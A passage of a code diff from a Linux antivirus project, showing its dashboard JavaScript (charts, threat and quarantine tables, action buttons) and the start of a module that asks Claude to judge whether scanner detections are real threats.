const ctx=cv.getContext('2d');ctx.scale(dpr,dpr);
const W=rect.width,H=opts.height||rect.height;
const pad={t:10,r:10,b:24,l:42};
const cw=W-pad.l-pad.r,ch=H-pad.t-pad.b;
// Background
ctx.fillStyle='#0d1117';ctx.fillRect(0,0,W,H);
// Grid
const gridLines=opts.gridLines||5;
const maxVal=opts.maxVal||Math.max(...datasets.flatMap(d=>d.data),1);
ctx.strokeStyle='#1e293b';ctx.lineWidth=1;ctx.font='10px system-ui';ctx.fillStyle='#6b7280';
for(let i=0;i<=gridLines;i++){
const y=pad.t+ch-(ch*i/gridLines);
ctx.beginPath();ctx.moveTo(pad.l,y);ctx.lineTo(pad.l+cw,y);ctx.stroke();
const v=((maxVal*i/gridLines)).toFixed(opts.decimals||0);
ctx.fillText(v+(opts.unit||''),2,y+3);
}
// Data lines
datasets.forEach(ds=>{
if(!ds.data.length)return;
const n=ds.data.length;
ctx.beginPath();ctx.strokeStyle=ds.color;ctx.lineWidth=ds.lineWidth||2;
ds.data.forEach((v,i)=>{
const x=pad.l+(cw*i/(n-1||1));
const y=pad.t+ch-ch*(Math.min(v,maxVal)/maxVal);
if(i===0)ctx.moveTo(x,y);else ctx.lineTo(x,y);
});
ctx.stroke();
// Fill
if(ds.fill){
ctx.lineTo(pad.l+cw,pad.t+ch);ctx.lineTo(pad.l,pad.t+ch);ctx.closePath();
ctx.fillStyle=ds.fill;ctx.fill();
}
});
// Labels
if(opts.labels&&opts.labels.length){
ctx.fillStyle='#6b7280';ctx.font='9px system-ui';ctx.textAlign='center';
const n=opts.labels.length;
opts.labels.forEach((l,i)=>{
if(i%Math.ceil(n/8)!==0&&i!==n-1)return;
const x=pad.l+(cw*i/(n-1||1));
ctx.fillText(l,x,H-2);
});
}
}
function drawBarChart(canvasId,data,opts={}){
const cv=$(canvasId);if(!cv||!data.length)return;
const dpr=window.devicePixelRatio||1;
const rect=cv.getBoundingClientRect();
cv.width=rect.width*dpr;cv.height=(opts.height||rect.height)*dpr;
const ctx=cv.getContext('2d');ctx.scale(dpr,dpr);
const W=rect.width,H=opts.height||rect.height;
const pad={t:10,r:10,b:28,l:42};
const cw=W-pad.l-pad.r,ch=H-pad.t-pad.b;
ctx.fillStyle='#0d1117';ctx.fillRect(0,0,W,H);
const maxVal=opts.maxVal||Math.max(...data.flatMap(d=>[(d.scans||0),(d.threats||0)]),1);
// Grid
ctx.strokeStyle='#1e293b';ctx.lineWidth=1;ctx.font='10px system-ui';ctx.fillStyle='#6b7280';
for(let i=0;i<=4;i++){
const y=pad.t+ch-(ch*i/4);
ctx.beginPath();ctx.moveTo(pad.l,y);ctx.lineTo(pad.l+cw,y);ctx.stroke();
ctx.fillText(Math.round(maxVal*i/4),2,y+3);
}
const n=data.length;const bw=Math.max((cw/n)*0.35,2);const gap=cw/n;
data.forEach((d,i)=>{
const x=pad.l+gap*i+gap*0.15;
const sh=ch*(d.scans||0)/maxVal;
const th=ch*(d.threats||0)/maxVal;
// Scans bar
ctx.fillStyle='#3b82f6';ctx.fillRect(x,pad.t+ch-sh,bw,sh);
// Threats bar
ctx.fillStyle='#ef4444';ctx.fillRect(x+bw+1,pad.t+ch-th,bw,th);
// Label
ctx.fillStyle='#6b7280';ctx.font='9px system-ui';ctx.textAlign='center';
const day=(d.day||'').slice(5);
ctx.fillText(day,x+bw,H-4);
});
}
function drawCoreChart(canvasId,cores){
const cv=$(canvasId);if(!cv||!cores.length)return;
const dpr=window.devicePixelRatio||1;
const rect=cv.getBoundingClientRect();
cv.width=rect.width*dpr;cv.height=140*dpr;
const ctx=cv.getContext('2d');ctx.scale(dpr,dpr);
const W=rect.width,H=140;
const pad={t:8,r:8,b:20,l:8};
const n=cores.length;const gap=4;
const bw=Math.min((W-pad.l-pad.r-(n-1)*gap)/n,60);
ctx.fillStyle='#0d1117';ctx.fillRect(0,0,W,H);
cores.forEach((pct,i)=>{
const x=pad.l+i*(bw+gap);
const barH=(H-pad.t-pad.b)*(pct/100);
const c=pct>90?'#ef4444':pct>70?'#f59e0b':pct>50?'#eab308':'#3b82f6';
// Background
ctx.fillStyle='#1e293b';ctx.fillRect(x,pad.t,bw,H-pad.t-pad.b);
// Bar
ctx.fillStyle=c;ctx.fillRect(x,H-pad.b-barH,bw,barH);
// Label
ctx.fillStyle='#e2e8f0';ctx.font='bold 10px system-ui';ctx.textAlign='center';
ctx.fillText(Math.round(pct)+'%',x+bw/2,H-pad.b-barH-4>pad.t?H-pad.b-barH-4:pad.t+12);
ctx.fillStyle='#6b7280';ctx.font='9px system-ui';
ctx.fillText('C'+i,x+bw/2,H-4);
});
}
function renderMemBars(h){
const total=h.mem_total||1;
const used=h.mem_used||0;
const cached=h.mem_cached||0;
const buffers=h.mem_buffers||0;
const avail=h.mem_available||0;
const app=used-cached-buffers;
const items=[
{label:'App/Used',val:Math.max(app,0),color:'var(--purple)'},
{label:'Cached',val:cached,color:'var(--cyan)'},
{label:'Buffers',val:buffers,color:'var(--accent)'},
{label:'Available',val:avail,color:'var(--green)'},
];
$('mem-bars').innerHTML=items.map(it=>{
const pct=(it.val/total*100).toFixed(1);
return `<div class="disk-row"><div class="disk-mount" style="width:70px"><span style="display:inline-block;width:8px;height:8px;border-radius:50%;background:${it.color};margin-right:4px"></span>${it.label}</div><div class="disk-bar-outer"><div class="disk-bar-inner" style="width:${pct}%;background:${it.color}"></div></div><div class="disk-pct">${fmtBytes(it.val)}</div></div>`;
}).join('');
// Swap
const spct=h.swap_total?(h.swap_used/h.swap_total*100).toFixed(1):0;
$('swap-bar').innerHTML=h.swap_total?`<div class="disk-row"><div class="disk-mount" style="width:70px">${fmtBytes(h.swap_used)}/${fmtBytes(h.swap_total)}</div><div class="disk-bar-outer"><div class="disk-bar-inner" style="width:${spct}%;background:var(--orange)"></div></div><div class="disk-pct">${spct}%</div></div>`:'<div style="color:var(--text-dim);font-size:.8rem">No swap</div>';
}
async function loadOverview(){
const [st,h,ts,ch]=await Promise.all([api('/api/status'),api('/api/health'),api('/api/threat-stats'),api('/api/scan-chart?days=14')]);
if(st){
$('hd-host').textContent=st.hostname||'';
$('hd-uptime').textContent=fmtDur(st.uptime_seconds);
$('hd-time').textContent=st.server_time||'';
const ls=st.last_scan;
$('ov-scan').textContent=ls?ago(ls.timestamp):'Never';
$('ov-scan-sub').textContent=ls?`${fmt(ls.files_scanned)} files, ${ls.threats_found} threats`:'No scans yet';
const sig=st.signatures||{};
$('ov-sigs').textContent=fmt((sig.total_hashes||0)+(sig.total_ips||0)+(sig.total_domains||0)+(sig.total_urls||0));
$('ov-sigs-sub').textContent=sig.last_update?'Updated '+ago(sig.last_update):'Not updated';
$('ov-quar').textContent=fmt(st.quarantine_count);
}
if(h){
// CPU per-core chart
const cores=h.cpu_per_core||[];
if(cores.length){
drawCoreChart('cpu-canvas',cores);
$('cpu-summary').textContent=`${cores.length} cores @ ${h.cpu_freq_mhz||'?'} MHz — avg ${Math.round(h.cpu_percent)}%`;
}
// CPU history
_cpuHistory.push(h.cpu_percent||0);if(_cpuHistory.length>_CPU_HIST_MAX)_cpuHistory.shift();
// Memory
_memHistory.push(h.mem_percent||0);if(_memHistory.length>_MEM_HIST_MAX)_memHistory.shift();
drawLineChart('mem-canvas',[
{data:_memHistory,color:'#8b5cf6',fill:'rgba(139,92,246,0.1)',lineWidth:2},
],{maxVal:100,unit:'%',height:160,gridLines:4});
$('mem-summary').textContent=`${fmtBytes(h.mem_used)} / ${fmtBytes(h.mem_total)} (${h.mem_percent?.toFixed(1)}%)`;
renderMemBars(h);
// Load / Net / Freq
const la=h.load_avg||[0,0,0];
$('ov-load').textContent=la.map(v=>v.toFixed(2)).join(' / ');
$('ov-netconn').textContent=fmt(h.net_connections||0);
$('ov-freq').textContent=h.cpu_freq_mhz?h.cpu_freq_mhz+' MHz':'—';
// Top processes
const procs=h.top_processes||[];
const ptb=$('proc-tbody');
if(procs.length){
ptb.innerHTML=procs.map(p=>{
const cpuC=p.cpu>50?'var(--red)':p.cpu>20?'var(--orange)':'var(--text)';
return `<tr><td class="mono">${p.pid}</td><td>${esc(p.name)}</td><td style="color:${cpuC};font-weight:600">${p.cpu}%</td><td>${p.mem}%</td></tr>`;
}).join('');
}else{ptb.innerHTML='<tr class="empty-row"><td colspan="4">No active processes</td></tr>';}
// Disks
const da=$('disk-area');
const disks=h.disk_usage||[];
if(disks.length){
da.innerHTML=disks.map(d=>{
const p=d.percent||0;const c=p>90?'var(--red)':p>70?'var(--orange)':'var(--accent)';
return `<div class="disk-row"><div class="disk-mount" title="${esc(d.mount)}">${esc(d.mount)}</div><div class="disk-bar-outer"><div class="disk-bar-inner" style="width:${p}%;background:${c}"></div></div><div class="disk-pct">${p.toFixed(1)}%</div><div style="font-size:.75rem;color:var(--text-dim);min-width:100px">${fmtBytes(d.used)} / ${fmtBytes(d.total)}</div></div>`;
}).join('');
}else{da.innerHTML='<div style="color:var(--text-dim);padding:8px">No disk info</div>';}
}
if(ts){
const bs=ts.by_severity||{};
$('ov-tc').textContent=fmt(bs.CRITICAL||0);
$('ov-th').textContent=fmt(bs.HIGH||0);
$('ov-tm').textContent=fmt(bs.MEDIUM||0);
$('ov-tl').textContent=fmt(bs.LOW||0);
}
if(ch&&ch.chart&&ch.chart.length){
drawBarChart('scan-canvas',ch.chart.slice(-14),{height:160});
}
}
/* ═══════ THREATS ═══════ */
async function loadThreats(){
const d=await api(`/api/threats?limit=200`);
if(!d)return;
S.threats=d.threats||[];
renderThreats();
}
function renderThreats(){
const sev=$('f-severity').value.toUpperCase();
const typ=$('f-type').value.toUpperCase();
const q=$('f-search').value.toLowerCase();
let f=S.threats;
if(sev)f=f.filter(t=>(t.severity||'').toUpperCase()===sev);
if(typ)f=f.filter(t=>(t.threat_type||'').toUpperCase()===typ);
if(q)f=f.filter(t=>(t.threat_name||'').toLowerCase().includes(q)||(t.file_path||'').toLowerCase().includes(q));
const total=f.length;const pages=Math.max(Math.ceil(total/S.threatPerPage),1);
S.threatPage=Math.min(S.threatPage,pages);
const start=(S.threatPage-1)*S.threatPerPage;
const slice=f.slice(start,start+S.threatPerPage);
const tb=$('threat-tbody');
if(!slice.length){tb.innerHTML='<tr class="empty-row"><td colspan="9">No threats detected ✅</td></tr>';
}else{tb.innerHTML=slice.map(t=>{
const act=t.action_taken||'detected';
const st=act==='detected'?'<span class="badge badge-warning">detected</span>':act==='quarantined'?'<span class="badge badge-info">quarantined</span>':statusBadge(act);
let btns='';
if(act==='detected'||act==='monitoring'){
btns=`<div style="display:flex;gap:4px;flex-wrap:wrap"><button class="btn btn-sm" style="background:var(--purple);color:#fff;border-color:var(--purple);font-size:.7rem;padding:3px 8px" onclick="aiAnalyze(${t.id},this)">🧠 AI Analyze</button><button class="btn btn-sm" style="background:var(--red);color:#fff;border-color:var(--red);font-size:.7rem;padding:3px 8px" onclick="threatAction('quarantine',${t.id},'${esc(t.file_path).replace(/'/g,"\\'")}','${esc(t.threat_name).replace(/'/g,"\\'")}',this)">🔒 Quarantine</button><button class="btn btn-sm" style="font-size:.7rem;padding:3px 8px" onclick="threatAction('delete-threat',${t.id},'${esc(t.file_path).replace(/'/g,"\\'")}','',this)">🗑️ Delete</button><button class="btn btn-sm" style="font-size:.7rem;padding:3px 8px" onclick="threatAction('whitelist',${t.id},'','',this)">✅ Ignore</button></div>`;
} else if(act==='quarantined'){
btns=`<div style="display:flex;gap:4px;flex-wrap:wrap"><button class="btn btn-sm" style="background:var(--purple);color:#fff;border-color:var(--purple);font-size:.7rem;padding:3px 8px" onclick="aiAnalyze(${t.id},this)">🧠 AI Analyze</button><button class="btn btn-sm" style="background:var(--green);color:#fff;border-color:var(--green);font-size:.7rem;padding:3px 8px" onclick="threatAction('restore',${t.id},'${esc(t.file_path).replace(/'/g,"\\'")}','',this)">♻️ Restore</button><button class="btn btn-sm" style="font-size:.7rem;padding:3px 8px" onclick="threatAction('delete-threat',${t.id},'${esc(t.file_path).replace(/'/g,"\\'")}','',this)">🗑️ Delete</button><button class="btn btn-sm" style="font-size:.7rem;padding:3px 8px" onclick="threatAction('whitelist',${t.id},'','',this)">✅ Ignore</button></div>`;
} else {
btns=`<span style="color:var(--text-dim);font-size:.75rem">${esc(act)}</span>`;
}
const det=t.details||'';
let aiCol='<span style="color:var(--text-dim);font-size:.75rem">—</span>';
const aiMatch=det.match(/\[AI:\s*(\w+)\s+(\d+)%\]\s*(.*)/);
if(aiMatch){const v=aiMatch[1],c=aiMatch[2],rsn=aiMatch[3];const vc=v==='safe'?'var(--green)':v==='threat'?'var(--red)':'var(--orange)';aiCol=`<div style="font-size:.75rem"><span style="color:${vc};font-weight:700">${v.toUpperCase()}</span> <span style="color:var(--text-dim)">${c}%</span><div style="color:var(--text-dim);max-width:150px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap" title="${esc(rsn)}">${esc(rsn)}</div></div>`;}
return `<tr><td>${ago(t.timestamp)}</td><td class="mono trunc" title="${esc(t.file_path)}">${esc(trunc(t.file_path,50))}</td><td>${esc(t.threat_name)}</td><td>${esc(t.threat_type)}</td><td>${sevBadge(t.severity)}</td><td>${esc(t.detector)}</td><td>${aiCol}</td><td>${st}</td><td>${btns}</td></tr>`;
}).join('');}
$('threat-page').textContent=`Page ${S.threatPage} of ${pages} (${total})`;
}
$('threat-prev').onclick=()=>{S.threatPage=Math.max(1,S.threatPage-1);renderThreats();};
$('threat-next').onclick=()=>{S.threatPage++;renderThreats();};
$('f-severity').onchange=$('f-type').onchange=()=>{S.threatPage=1;renderThreats();};
let _tTimer;$('f-search').oninput=()=>{clearTimeout(_tTimer);_tTimer=setTimeout(()=>{S.threatPage=1;renderThreats();},300);};
/* ═══════ SCANS ═══════ */
async function loadScans(){
const [sc,ch]=await Promise.all([api('/api/scans?limit=30'),api('/api/scan-chart?days=30')]);
if(sc){
const tb=$('scan-tbody');
const scans=sc.scans||[];
if(!scans.length){tb.innerHTML='<tr class="empty-row"><td colspan="7">No scans yet</td></tr>';
}else{tb.innerHTML=scans.map(s=>`<tr><td>${ago(s.timestamp)}</td><td>${esc(s.scan_type)}</td><td class="mono trunc" title="${esc(s.scan_path)}">${esc(trunc(s.scan_path,40))}</td><td>${fmt(s.files_scanned)}</td><td>${s.threats_found?'<span style="color:var(--red)">'+s.threats_found+'</span>':'0'}</td><td>${fmtDur(s.duration_seconds)}</td><td>${statusBadge(s.status)}</td></tr>`).join('');}
}
if(ch&&ch.chart&&ch.chart.length)drawBarChart('scan-chart-canvas',ch.chart,{height:160});
}
/* ═══════ DEFINITIONS ═══════ */
Q('#def-subtabs .sub-tab').forEach(t=>t.addEventListener('click',()=>{
Q('#def-subtabs .sub-tab').forEach(x=>x.classList.remove('active'));
t.classList.add('active');S.defType=t.dataset.def;S.defPage=1;loadDefs();
}));
let _dTimer;$('def-search').oninput=()=>{clearTimeout(_dTimer);_dTimer=setTimeout(()=>{S.defPage=1;S.defSearch=$('def-search').value;loadDefs();},400);};
function defPage(d){S.defPage=Math.max(1,S.defPage+d);loadDefs();}
async function loadDefs(){
const typ=S.defType==='all'?'':S.defType;
const q=encodeURIComponent(S.defSearch||'');
const [dd,su]=await Promise.all([
api(`/api/definitions?type=${typ}&page=${S.defPage}&per_page=${S.defPerPage}&search=${q}`),
api('/api/sig-updates?limit=10')
]);
if(dd){
$('def-hashes').textContent=fmt(dd.total_hashes);
$('def-ips').textContent=fmt(dd.total_ips);
$('def-domains').textContent=fmt(dd.total_domains);
$('def-urls').textContent=fmt(dd.total_urls);
renderDefTable(dd);
const total=dd.total_hashes+dd.total_ips+dd.total_domains+dd.total_urls;
const pages=Math.max(Math.ceil(total/S.defPerPage),1);
$('def-page-info').textContent=`Page ${S.defPage} of ${pages}`;
}
if(su){
const tb=$('sigup-tbody');
const ups=su.updates||[];
if(!ups.length){tb.innerHTML='<tr class="empty-row"><td colspan="7">No updates yet</td></tr>';
}else{tb.innerHTML=ups.map(u=>`<tr><td>${ago(u.timestamp)}</td><td>${esc(u.feed_name)}</td><td>${fmt(u.hashes_added)}</td><td>${fmt(u.ips_added)}</td><td>${fmt(u.domains_added)}</td><td>${fmt(u.urls_added)}</td><td>${statusBadge(u.status)}</td></tr>`).join('');}
}
}
function renderDefTable(dd){
const th=$('def-thead');const tb=$('def-tbody');
let rows=[];const t=S.defType;
if(t==='all'||t==='hash'){
th.innerHTML='<tr><th>Hash</th><th>Threat Name</th><th>Type</th><th>Severity</th><th>Source</th><th>Date</th></tr>';
rows=rows.concat((dd.hashes||[]).map(r=>`<tr><td class="mono">${esc(trunc(r.hash,16))}</td><td>${esc(r.threat_name)}</td><td>${esc(r.threat_type)}</td><td>${sevBadge(r.severity)}</td><td>${esc(r.source)}</td><td>${ago(r.added_date)}</td></tr>`));
}
if(t==='all'||t==='ip'){
if(t==='ip')th.innerHTML='<tr><th>IP Address</th><th>Threat Name</th><th>Type</th><th>Source</th><th>Date</th></tr>';
rows=rows.concat((dd.ips||[]).map(r=>`<tr><td class="mono">${esc(r.ip)}</td><td>${esc(r.threat_name)}</td><td>${esc(r.type)}</td><td>${esc(r.source)}</td><td>${ago(r.added_date)}</td></tr>`));
}
if(t==='all'||t==='domain'){
if(t==='domain')th.innerHTML='<tr><th>Domain</th><th>Threat Name</th><th>Type</th><th>Source</th><th>Date</th></tr>';
rows=rows.concat((dd.domains||[]).map(r=>`<tr><td class="mono">${esc(r.domain)}</td><td>${esc(r.threat_name)}</td><td>${esc(r.type)}</td><td>${esc(r.source)}</td><td>${ago(r.added_date)}</td></tr>`));
}
if(t==='all'||t==='url'){
if(t==='url')th.innerHTML='<tr><th>URL</th><th>Threat Name</th><th>Type</th><th>Source</th><th>Date</th></tr>';
rows=rows.concat((dd.urls||[]).map(r=>`<tr><td class="mono trunc" title="${esc(r.url)}">${esc(trunc(r.url,60))}</td><td>${esc(r.threat_name)}</td><td>${esc(r.type)}</td><td>${esc(r.source)}</td><td>${ago(r.added_date)}</td></tr>`));
}
if(t==='all'&&!rows.length&&!dd.hashes?.length)th.innerHTML='<tr><th>Hash</th><th>Threat Name</th><th>Type</th><th>Severity</th><th>Source</th><th>Date</th></tr>';
tb.innerHTML=rows.length?rows.join(''):'<tr class="empty-row"><td colspan="6">No definitions found. Run an update to fetch threat feeds.</td></tr>';
}
/* ═══════ CONTAINERS ═══════ */
async function loadContainers(){
const [cl,cs]=await Promise.all([api('/api/containers'),api('/api/container-scan')]);
if(cl){
$('ct-count').textContent=fmt(cl.count);
$('ct-runtimes').textContent=cl.runtimes.length?cl.runtimes.join(', '):'None detected';
const tb=$('ct-tbody');
const cc=cl.containers||[];
if(!cc.length){tb.innerHTML='<tr class="empty-row"><td colspan="8">No containers found. Install Docker, Podman, or LXC.</td></tr>';
}else{
tb.innerHTML=cc.map(c=>{
const st=c.status==='running'?'<span class="badge badge-success">running</span>':c.status==='stopped'?'<span class="badge badge-error">stopped</span>':'<span class="badge badge-warning">'+esc(c.status)+'</span>';
const ports=(c.ports||[]).slice(0,3).join(', ');
return `<tr><td class="mono">${esc(trunc(c.container_id,12))}</td><td>${esc(c.name)}</td><td class="mono trunc" title="${esc(c.image)}">${esc(trunc(c.image,30))}</td><td>${esc(c.runtime)}</td><td>${st}</td><td class="mono">${esc(c.ip_address||'')}</td><td class="mono" style="font-size:.72rem">${esc(ports)}</td><td><button class="btn btn-sm" onclick="scanSingleContainer('${esc(c.container_id)}',this)">Scan</button></td></tr>`;
}).join('');
}
}
if(cs){
const threats=cs.threats||[];
$('ct-threats').textContent=fmt(threats.length);
const tb=$('ct-threat-tbody');
if(!threats.length){tb.innerHTML='<tr class="empty-row"><td colspan="6">No container threats ✅</td></tr>';
}else{tb.innerHTML=threats.map(t=>`<tr><td>${ago(t.timestamp)}</td><td>${esc(trunc(t.file_path,30))}</td><td>${esc(t.threat_name)}</td><td>${esc(t.threat_type)}</td><td>${sevBadge(t.severity)}</td><td class="trunc" title="${esc(t.details)}">${esc(trunc(t.details,60))}</td></tr>`).join('');}
}
}
async function scanSingleContainer(id,btn){
const orig=btn.innerHTML;btn.innerHTML='<span class="spinner"></span>';btn.disabled=true;
toast(`Scanning container ${id.slice(0,12)}…`,'info');
try{
const r=await fetch('/api/actions/scan-container',{method:'POST',headers:{'Content-Type':'application/json','X-API-Key':window.AYN_API_KEY||''},body:JSON.stringify({container_id:id})});
const ct=r.headers.get('content-type')||'';
if(!ct.includes('application/json')){const t=await r.text();toast('Server error: '+t.slice(0,100),'error');btn.innerHTML=orig;btn.disabled=false;return;}
const d=await r.json();
if(d.status==='error'){toast(d.error||'Failed','error');}
else{toast(`Container scan: ${d.threats_found||0} threats found`,'success');}
loadContainers();
}catch(e){toast('Failed: '+e.message,'error');}
btn.innerHTML=orig;btn.disabled=false;
}
/* ═══════ QUARANTINE ═══════ */
async function loadQuarantine(){
const d=await api('/api/quarantine');
if(!d)return;
$('q-count').textContent=fmt(d.count);
$('q-size').textContent=fmtBytes(d.total_size);
const tb=$('quar-tbody');
const items=d.items||[];
if(!items.length){tb.innerHTML='<tr class="empty-row"><td colspan="5">Vault is empty ✅</td></tr>';
}else{tb.innerHTML=items.map(i=>`<tr><td class="mono">${esc(trunc(i.id,12))}</td><td class="mono trunc" title="${esc(i.original_path)}">${esc(trunc(i.original_path,50))}</td><td>${esc(i.threat_name)}</td><td>${ago(i.quarantine_date)}</td><td>${fmtBytes(i.size||i.file_size||0)}</td></tr>`).join('');}
}
/* ═══════ LOGS ═══════ */
async function loadLogs(){
const d=await api('/api/logs?limit=50');
if(!d)return;
const lv=$('log-view');
const logs=d.logs||[];
if(!logs.length){lv.innerHTML='<div style="color:var(--text-dim);padding:12px">No activity yet.</div>';return;}
lv.innerHTML=logs.map(l=>{
const lc=l.level==='ERROR'?'var(--red)':l.level==='WARNING'?'var(--orange)':'var(--accent)';
return `<div class="log-line"><span class="log-ts">${l.timestamp||''}</span><span style="color:${lc};font-weight:700;min-width:56px">${l.level}</span><span class="log-src">${esc(l.source)}</span><span class="log-msg">${esc(l.message)}</span></div>`;
}).join('');
lv.scrollTop=0;
}
/* ═══════ AI ANALYSIS ═══════ */
async function aiAnalyze(threatId,btn){
const orig=btn.innerHTML;btn.innerHTML='<span class="spinner"></span> Analyzing…';btn.disabled=true;
try{
const r=await fetch('/api/actions/ai-analyze',{method:'POST',headers:{'Content-Type':'application/json','X-API-Key':window.AYN_API_KEY||''},body:JSON.stringify({threat_id:threatId})});
const ct=r.headers.get('content-type')||'';
if(!ct.includes('application/json')){toast('Server error','error');btn.innerHTML=orig;btn.disabled=false;return;}
const d=await r.json();
if(d.status==='ok'){
const emoji=d.verdict==='safe'?'✅':d.verdict==='threat'?'🚨':'⚠️';
const color=d.verdict==='safe'?'success':d.verdict==='threat'?'error':'info';
toast(`${emoji} AI: ${d.verdict.toUpperCase()} (${d.confidence}%) — ${d.reason}`,color);
if(d.verdict==='safe'){toast(`Recommended: ${d.recommended_action}`,'info');}
loadThreats();
} else {toast(d.error||'AI analysis failed','error');}
}catch(e){toast('Failed: '+e.message,'error');}
btn.innerHTML=orig;btn.disabled=false;
}
/* ═══════ THREAT ACTIONS ═══════ */
async function threatAction(action,threatId,filePath,threatName,btn){
const labels={'quarantine':'Quarantine','delete-threat':'Delete','whitelist':'Whitelist'};
if(action==='delete-threat'&&!confirm('Permanently delete '+filePath+'?'))return;
const wrap=btn.parentElement;const orig=wrap.innerHTML;wrap.innerHTML='<span class="spinner"></span>';
try{
const body={threat_id:threatId};
if(filePath)body.file_path=filePath;
if(threatName)body.threat_name=threatName;
const r=await fetch('/api/actions/'+action,{method:'POST',headers:{'Content-Type':'application/json','X-API-Key':window.AYN_API_KEY||''},body:JSON.stringify(body)});
const ct=r.headers.get('content-type')||'';
if(!ct.includes('application/json')){toast('Server error','error');wrap.innerHTML=orig;return;}
const d=await r.json();
if(d.status==='ok'){toast((labels[action]||action)+' done','success');loadThreats();}
else{toast(d.error||'Failed','error');wrap.innerHTML=orig;}
}catch(e){toast('Failed: '+e.message,'error');wrap.innerHTML=orig;}
}
/* ═══════ ACTIONS ═══════ */
async function doAction(action,btn){
const orig=btn.innerHTML;btn.innerHTML='<span class="spinner"></span> Running…';btn.disabled=true;
toast(`${action} started…`,'info');
try{
const r=await fetch(`/api/actions/${action}`,{method:'POST',headers:{'X-API-Key':window.AYN_API_KEY||''}});
const ct=r.headers.get('content-type')||'';
if(!ct.includes('application/json')){const t=await r.text();toast('Server error: '+(r.status>=400?r.status+' ':'')+t.slice(0,100),'error');btn.innerHTML=orig;btn.disabled=false;return;}
const d=await r.json();
if(d.status==='error'){toast(d.error||'Failed','error');}
else{toast(`${action} completed`,'success');}
refreshAll();
}catch(e){toast('Request failed: '+e.message,'error');}
btn.innerHTML=orig;btn.disabled=false;
}
async function doFeedUpdate(feed,btn){
const orig=btn.innerHTML;btn.innerHTML='<span class="spinner"></span>';btn.disabled=true;
toast(`Updating ${feed}…`,'info');
try{
const r=await fetch('/api/actions/update-feed',{method:'POST',headers:{'Content-Type':'application/json','X-API-Key':window.AYN_API_KEY||''},body:JSON.stringify({feed})});
const ct=r.headers.get('content-type')||'';
if(!ct.includes('application/json')){const t=await r.text();toast(`${feed}: Server error `+t.slice(0,100),'error');btn.innerHTML=orig;btn.disabled=false;return;}
const d=await r.json();
if(d.status==='error'){toast(`${feed}: ${d.error}`,'error');}
else{toast(`${feed} updated`,'success');}
loadDefs();
}catch(e){toast('Failed: '+e.message,'error');}
btn.innerHTML=orig;btn.disabled=false;
}
/* ═══════ REFRESH ═══════ */
async function refreshAll(){
await loadOverview();
const active=document.querySelector('.nav-tab.active');
if(active){
const tab=active.dataset.tab;
if(tab==='threats')loadThreats();
if(tab==='scans')loadScans();
if(tab==='definitions')loadDefs();
if(tab==='containers')loadContainers();
if(tab==='quarantine')loadQuarantine();
if(tab==='logs')loadLogs();
}
}
/* ── Boot ── */
refreshAll();
setInterval(refreshAll,30000);
</script>
</body>
</html>"""

View File

@@ -0,0 +1,20 @@
"""AYN Antivirus detector modules."""
from ayn_antivirus.detectors.base import BaseDetector, DetectionResult
from ayn_antivirus.detectors.cryptominer_detector import CryptominerDetector
from ayn_antivirus.detectors.heuristic_detector import HeuristicDetector
from ayn_antivirus.detectors.rootkit_detector import RootkitDetector
from ayn_antivirus.detectors.signature_detector import SignatureDetector
from ayn_antivirus.detectors.spyware_detector import SpywareDetector
from ayn_antivirus.detectors.yara_detector import YaraDetector
__all__ = [
"BaseDetector",
"DetectionResult",
"CryptominerDetector",
"HeuristicDetector",
"RootkitDetector",
"SignatureDetector",
"SpywareDetector",
"YaraDetector",
]

View File

@@ -0,0 +1,268 @@
"""AYN Antivirus — AI-Powered Threat Analyzer.
Uses Claude to analyze suspicious files and filter false positives.
Each detection from heuristic/signature scanners is verified by AI
before being reported as a real threat.
"""
from __future__ import annotations
import json
import logging
import os
import platform
from dataclasses import dataclass
from pathlib import Path
from typing import Any, Dict, List, Optional
logger = logging.getLogger(__name__)
SYSTEM_PROMPT = """Linux VPS antivirus analyst. {environment}
Normal: pip/npm scripts in /usr/local/bin, Docker hex IDs, cron jobs (fstrim/certbot/logrotate), high-entropy archives, curl/wget in deploy scripts, recently-modified files after apt/pip.
Reply ONLY JSON: {{"verdict":"threat"|"safe"|"suspicious","confidence":0-100,"reason":"short","recommended_action":"quarantine"|"delete"|"ignore"|"monitor"}}"""
ANALYSIS_PROMPT = """FILE:{file_path} DETECT:{threat_name}({threat_type}) SEV:{severity} DET:{detector} CONF:{original_confidence}% SIZE:{file_size} PERM:{permissions} OWN:{owner} MOD:{mtime}
PREVIEW:
{content_preview}
JSON verdict:"""
@dataclass
class AIVerdict:
"""Result of AI analysis on a detection."""
verdict: str # threat, safe, suspicious
confidence: int # 0-100
reason: str
recommended_action: str # quarantine, delete, ignore, monitor
raw_response: str = ""
@property
def is_threat(self) -> bool:
return self.verdict == "threat"
@property
def is_safe(self) -> bool:
return self.verdict == "safe"
class AIAnalyzer:
"""AI-powered threat analysis using Claude."""
def __init__(self, api_key: Optional[str] = None, model: str = "claude-sonnet-4-20250514"):
self._api_key = api_key or os.environ.get("ANTHROPIC_API_KEY", "") or self._load_key_from_env_file()
self._model = model
self._client = None
self._environment = self._detect_environment()
@staticmethod
def _load_key_from_env_file() -> str:
for p in ["/opt/ayn-antivirus/.env", Path.home() / ".ayn-antivirus" / ".env"]:
try:
for line in Path(p).read_text().splitlines():
line = line.strip()
if line.startswith("ANTHROPIC_API_KEY=") and not line.endswith("="):
return line.split("=", 1)[1].strip().strip("'\"")
except Exception:
pass
return ""
@property
def available(self) -> bool:
return bool(self._api_key)
def _get_client(self):
if not self._client:
try:
import anthropic
self._client = anthropic.Anthropic(api_key=self._api_key)
except Exception as exc:
logger.error("Failed to init Anthropic client: %s", exc)
return None
return self._client
@staticmethod
def _detect_environment() -> str:
"""Gather environment context for the AI."""
import shutil
parts = [
f"OS: {platform.system()} {platform.release()}",
f"Hostname: {platform.node()}",
f"Arch: {platform.machine()}",
]
if shutil.which("incus"):
parts.append("Container runtime: Incus/LXC (containers run Docker inside)")
if shutil.which("docker"):
parts.append("Docker: available")
if Path("/etc/dokploy").exists() or shutil.which("dokploy"):
parts.append("Platform: Dokploy (Docker deployment platform)")
# Check if we're inside a container
if Path("/run/host/container-manager").exists():
parts.append("Running inside: managed container")
return "\n".join(parts)
def _get_file_context(self, file_path: str) -> Dict[str, Any]:
"""Gather file metadata and content preview."""
p = Path(file_path)
ctx = {
"file_size": 0,
"permissions": "",
"owner": "",
"mtime": "",
"content_preview": "[file not readable]",
}
try:
st = p.stat()
ctx["file_size"] = st.st_size
ctx["permissions"] = oct(st.st_mode)[-4:]
ctx["mtime"] = str(st.st_mtime)
try:
import pwd
